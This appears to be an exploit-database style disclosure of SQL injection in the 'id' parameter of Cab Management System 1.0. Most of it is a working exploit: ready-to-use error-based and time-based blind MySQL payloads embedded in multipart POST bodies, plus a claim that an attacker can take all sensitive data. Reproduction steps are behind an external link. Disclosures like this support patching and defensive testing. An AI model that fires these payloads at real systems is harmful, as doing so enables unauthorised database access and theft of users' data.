## Titles: Cab Management System-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/18/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can get all sensitive information from this system when he attacks it online!
STATUS: HIGH- Vulnerability
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: MULTIPART id ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="id"
' OR (SELECT 3657 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SELECT (ELT(3657=3657,1))),0x7170707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# cdWs
------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="cab_id"
------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="pickup_zone"
Pickup Zo
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="id"
' AND (SELECT 9442 FROM (SELECT(SLEEP(7)))sClH)# GuEv
------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="cab_id"
------WebKitFormBoundaryIbJVt1VZ8NxohltC
Content-Disposition: form-data; name="pickup_zone"
Pickup Zo
---
```
## Reproduce:
[href](https://www.patreon.com/posts/cab-management-1-112288725)
## Proof and Exploit:
[href]()
## Time spent:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>